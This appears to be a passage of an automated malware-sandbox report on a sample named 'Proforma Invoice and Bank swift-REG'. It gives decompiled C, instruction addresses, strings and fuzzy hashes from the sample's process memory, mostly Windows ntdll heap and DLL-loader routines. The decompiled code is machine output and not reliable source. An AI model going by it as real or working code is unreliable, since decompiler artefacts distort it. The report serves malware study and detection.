									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00BAA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xbd8748 - 1;
					if( *0xbd8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00AEB150();
							} else {
								E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00AEB150();
							__eflags =  *0xbd7bc8;
							if(__eflags == 0) {
								_t131 = E00BA2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x00b0a83a
0x00b0a83c
0x00b0a83e
0x00b0a841
0x00b0a844
0x00b0a84a
0x00b0aa53
0x00b0aa59
0x00b0aa59
0x00b0a858
0x00b0a85e
0x00b0aaf5
0x00b0aafc
0x00b5229e
0x00b522a2
0x00b522a8
0x00b522b3
0x00b522b5
0x00b522bb
0x00b522c1
0x00b522c5
0x00b522e6
0x00b522eb
0x00b522f0
0x00b522c7
0x00b522dc
0x00b522e1
0x00b522e1
0x00b522f3
0x00b522f8
0x00b522fd
0x00b52300
0x00b52307
0x00b5230e
0x00b5230e
0x00b52313
0x00b52313
0x00b522b5
0x00b522a2
0x00b0aafc
0x00b0a864
0x00b0a869
0x00b0aa5c
0x00b0aa5e
0x00b0a86f
0x00b0a87f
0x00b0a885
0x00b0a885
0x00b0a88b
0x00b0a890
0x00b0a896
0x00b0ab0c
0x00b0ab0f
0x00b0ab15
0x00b52320
0x00b52320
0x00b0ab1b
0x00b0a89c
0x00b0a89f
0x00b0a8a2
0x00b0a8a2
0x00b0a8a5
0x00b0a8af
0x00b0a8b3
0x00b0a8b8
0x00b0aa66
0x00b0a8be
0x00b0a8c5
0x00b0a8c6
0x00b0a8ce
0x00b52328
0x00b52332
0x00b52337
0x00b52337
0x00b0a8ce
0x00b0a8d4
0x00b0a8d8
0x00b0a8db
0x00b0a8de
0x00b0a8e1
0x00b0a8e5
0x00b0a8e8
0x00b0a8f0
0x00b0a8f3
0x00b5234c
0x00b52350
0x00b52355
0x00b52359
0x00b52359
0x00b0a8f9
0x00b0a901
0x00b0aae4
0x00b0aae4
0x00b0aaea
0x00000000
0x00b0a907
0x00b0a90a
0x00b0a91d
0x00b0a91d
0x00000000
0x00b0a910
0x00b0a910
0x00b0a910
0x00b0a914
0x00b0a924
0x00b0a924
0x00b0a924
0x00b0a924
0x00b0a916
0x00b0a91b
0x00000000
0x00000000
0x00000000
0x00b0a91b
0x00b0a925
0x00b0a925
0x00b0a932
0x00b0a936
0x00b0a93c
0x00b0a93c
0x00b0a93c
0x00b0ab22
0x00b0ab24
0x00b0ab27
0x00b0ab27
0x00b0a942
0x00b0a944
0x00b0aaba
0x00b0aabd
0x00b0aac0
0x00b0aac0
0x00b0aac2
0x00b0ab2f
0x00b0aac4
0x00b0aac4
0x00b0aac7
0x00b0aaca
0x00b0aacc
0x00b0aace
0x00b0aace
0x00b0aace
0x00b0aad1
0x00b0aad1
0x00b0aad7
0x00b0aad9
0x00000000
0x00000000
0x00b52361
0x00b52369
0x00b5236b
0x00000000
0x00b52371
0x00000000
0x00b52371
0x00000000
0x00b5236b
0x00b0aac0
0x00b0a94a
0x00b0a94a
0x00b0a94d
0x00b0a94d
0x00b0a950
0x00b0a954
0x00b52376
0x00b52380
0x00b0a95a
0x00b0a95a
0x00b0a95c
0x00b0a95f
0x00b0a961
0x00b0a961
0x00b0a967
0x00b0a96a
0x00b0a972
0x00b0aa02
0x00b0aa06
0x00b0aa10
0x00b0aa16
0x00b0aa16
0x00b0aa1b
0x00b0aa21
0x00b0aa24
0x00b0aa27
0x00b0aa29
0x00b0aa2c
0x00b0aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x00b0a978
0x00b0a978
0x00b0a97b
0x00b0a981
0x00b0a996
0x00b0a998
0x00b0a99f
0x00b0a9a2
0x00b5238a
0x00b0a9a8
0x00b0a9a8
0x00b0a9a8
0x00b0a9aa
0x00b0a9ad
0x00b0a9b0
0x00b0a9bb
0x00b0a9be
0x00b0a9c7
0x00b0a9c9
0x00b0a9c9
0x00b0a9cc
0x00b0a9d1
0x00b0aa6d
0x00b0aa70
0x00b0aa73
0x00b0aa75
0x00b0aa79
0x00b0aa7e
0x00b0aa82
0x00b0aa8f
0x00b0aa94
0x00b0aa96
0x00b52392
0x00b523a1
0x00b523a1
0x00b0aa9c
0x00b0aa9f
0x00b0aaa2
0x00b0aaa2
0x00b0aaa8
0x00b0aaab
0x00b0aaaf
0x00000000
0x00b0aab5
0x00000000
0x00b0aab5
0x00b0a9d7
0x00b0a9d7
0x00b0a9da
0x00b0a9e0
0x00b0a9e3
0x00b0a9e6
0x00b0a9e9
0x00b0a9eb
0x00b0a9fd
0x00b0a9fd
0x00000000
0x00b0a9eb
0x00000000
0x00000000
0x00000000
0x00b0a983
0x00b0a983
0x00b0a983
0x00b0a987
0x00b0a995
0x00b0a995
0x00b0a995
0x00b0a995
0x00b0a989
0x00b0a98e
0x00000000
0x00b0a990
0x00000000
0x00b0a990
0x00b0a98e
0x00000000
0x00b0a983
0x00b0a972
0x00b0a90a
0x00b0aa34
0x00b0aa34
0x00b0aa40
0x00b0aa43
0x00b0aa46
0x00b0aa4d
0x00b523ab
0x00b523b2
0x00b523b8
0x00b523be
0x00b523c3
0x00b523c5
0x00b523cb
0x00b523d1
0x00b523d5
0x00b523f6
0x00b523fb
0x00b523d7
0x00b523ec
0x00b523f1
0x00b52403
0x00b52408
0x00b52410
0x00b52417
0x00b52422
0x00b52422
0x00b52417
0x00b523c5
0x00b523b2
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00B522D7, 00B523E7
HEAP: , xrefs: 00B522E6, 00B523F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00B522F3
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00B52403

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 125ba6ee5a8def6708fdd79c32d99cfcdb6f7c2a50af931326d5de8d33e01c88
Instruction ID: 009c5878aa2da71efba41a8965beb72110a8507d696c1212beefebfa83fe4aba
Opcode Fuzzy Hash: 125ba6ee5a8def6708fdd79c32d99cfcdb6f7c2a50af931326d5de8d33e01c88
Instruction Fuzzy Hash: 18D1B134A003459FDB18CF68C590BBABBF1FF48300F1589A9E85A9B381E734AD45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B0A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00B0A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00B0DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00B29730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00BAA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00B29660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00AEB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00B07D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00BA138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00B07D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00B07D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00BA1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00B07D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00B07D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00BA1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00B3D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x00b0a229
0x00b0a231
0x00b0a23f
0x00b0a242
0x00b0a244
0x00b0a24c
0x00b0a255
0x00b0a25a
0x00b0a25f
0x00b51c76
0x00b51c78
0x00b51c7e
0x00b51c7f
0x00b51c81
0x00b51c82
0x00b51c84
0x00b51c89
0x00b51c8b
0x00b51c9e
0x00b51c9e
0x00b51cab
0x00b51cb2
0x00000000
0x00b51cb2
0x00b51c8d
0x00b51c92
0x00000000
0x00000000
0x00b51c94
0x00b51c98
0x00000000
0x00000000
0x00000000
0x00b51c98
0x00b0a265
0x00b0a265
0x00b0a266
0x00b0a26f
0x00b0a270
0x00b0a276
0x00b0a277
0x00b0a279
0x00b0a27e
0x00b0a282
0x00b51db5
0x00b51dbb
0x00b51dc1
0x00b51dc5
0x00b51de4
0x00b51de9
0x00b51dc7
0x00b51ddc
0x00b51de1
0x00b51def
0x00b51df3
0x00b51df7
0x00b51dfe
0x00b51e06
0x00b0a302
0x00b0a308
0x00b0a308
0x00b0a288
0x00b0a28d
0x00b0a294
0x00b51cc1
0x00b0a29a
0x00b0a29a
0x00b0a29a
0x00b0a29f
0x00b51ccb
0x00b51cd1
0x00b51cd8
0x00b51cea
0x00b51cea
0x00b51cd8
0x00b0a2a9
0x00b0a2af
0x00b0a2bc
0x00b51cfd
0x00b0a2c2
0x00b0a2c2
0x00b0a2c2
0x00b0a2c7
0x00b51d07
0x00b51d0d
0x00b51d14
0x00b51d1f
0x00b51d21
0x00b51d2c
0x00b51d2c
0x00b51d2c
0x00b51d47
0x00b51d47
0x00b51d14
0x00b0a2cd
0x00b0a2d2
0x00b0a2d9
0x00b51d5a
0x00b0a2df
0x00b0a2df
0x00b0a2df
0x00b0a2e4
0x00b51d69
0x00b51d6b
0x00b51d76
0x00b51d76
0x00b51d76
0x00b51d91
0x00b51d91
0x00b0a2ea
0x00b0a2f0
0x00b0a2f5
0x00b51da8
0x00b51dad
0x00b51dad
0x00b0a2fd
0x00b0a300
0x00000000

Strings

`, xrefs: 00B51C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00B51DF9
HEAP[%wZ]: , xrefs: 00B51DD7
HEAP: , xrefs: 00B51DE4

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 21d001a748f9e77e17ddb156ed94e8b227c23f4377fab0fcfb208a4e9d304ad8
Instruction ID: d889684db29b8433caf585b43f32d059df395f6bd4b56a2944305eb0ce932272
Opcode Fuzzy Hash: 21d001a748f9e77e17ddb156ed94e8b227c23f4377fab0fcfb208a4e9d304ad8
Instruction Fuzzy Hash: 3A51E1322057809FD712DB68C845F677BE8EB84B50F1909F8F8558B2D2DB25E804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B18E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00B18E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xbdd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xbd8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xbd5780 & 0x00000003) != 0) {
							E00B65510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xbd5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00B2B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xbd7984; // 0x682c08
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xbd8464; // 0x73b80110
					 *0xbdb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00B19B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xbd5780 & 0x00000005) != 0) {
						_push(_t49);
						E00B65510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00b18e0f
0x00b18e16
0x00b18e19
0x00b18e1b
0x00b18e21
0x00b18e7f
0x00b18e85
0x00b59354
0x00b5936c
0x00b59371
0x00b5937b
0x00b59381
0x00b59381
0x00b5937b
0x00b18e9d
0x00b18e9d
0x00b18e29
0x00b18e2c
0x00b18e38
0x00b18e3e
0x00b18e43
0x00b18eb5
0x00b18eb9
0x00b592aa
0x00b592af
0x00b592e8
0x00b592e8
0x00b592af
0x00b18eb9
0x00b18e45
0x00b18e53
0x00b18e5b
0x00b18e5f
0x00b18e78
0x00b18e78
0x00b18e7d
0x00b18ec3
0x00b18ecd
0x00b18ed2
0x00b18ed2
0x00b18ec5
0x00b18ec5
0x00000000
0x00b18e7d
0x00b18e67
0x00b18ea4
0x00b5931a
0x00000000
0x00000000
0x00b59320
0x00b18ea4
0x00b18e70
0x00b59325
0x00b59340
0x00b59345
0x00b59345
0x00b18e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 00B5933B, 00B59367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00B5932A
Querying the active activation context failed with status 0x%08lx, xrefs: 00B59357
LdrpFindDllActivationContext, xrefs: 00B59331, 00B5935D

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f5586d4cf048d718774871c21d2ba45cf026cccc9ccf92e069fecd4b445be72d
Instruction ID: ef5ba0d44a01a40d55ca1cdcde361de7ef179b7f02ee0e86aeb993d1daf7dd30
Opcode Fuzzy Hash: f5586d4cf048d718774871c21d2ba45cf026cccc9ccf92e069fecd4b445be72d
Instruction Fuzzy Hash: C0411423A00315EEDF35AB18C899BF6B7E4FB10304F9645EAE808975A1EF709DC082C1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 00BA4AD6
HEAP[%wZ]: , xrefs: 00BA4A3D, 00BA4AB7
HEAP: , xrefs: 00BA4A4A, 00BA4A5D, 00BA4A5F, 00BA4AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 00BA4A61

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: af15cfb620a234e9a157fb253fb916befaf8786f01289caaf55d22a106194393
Instruction ID: 3bd1939eecda9970ccccc55069d1a1eb8cc585c537e67cd18ef8f5a426c79987
Opcode Fuzzy Hash: af15cfb620a234e9a157fb253fb916befaf8786f01289caaf55d22a106194393
Instruction Fuzzy Hash: 0C316831289110FFC710DB98C98AF6773E8FF46760F25459AF405DB292E7B0AC40C669

Uniqueness

Uniqueness Score: -1.00%

Function 00B099BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00B099BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00B9FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00BAA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E00B3D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00AEB150();
										} else {
											E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00AEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xbd6378 = 1;
											asm("int3");
											 *0xbd6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00B0A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E00B0A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E00B0BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
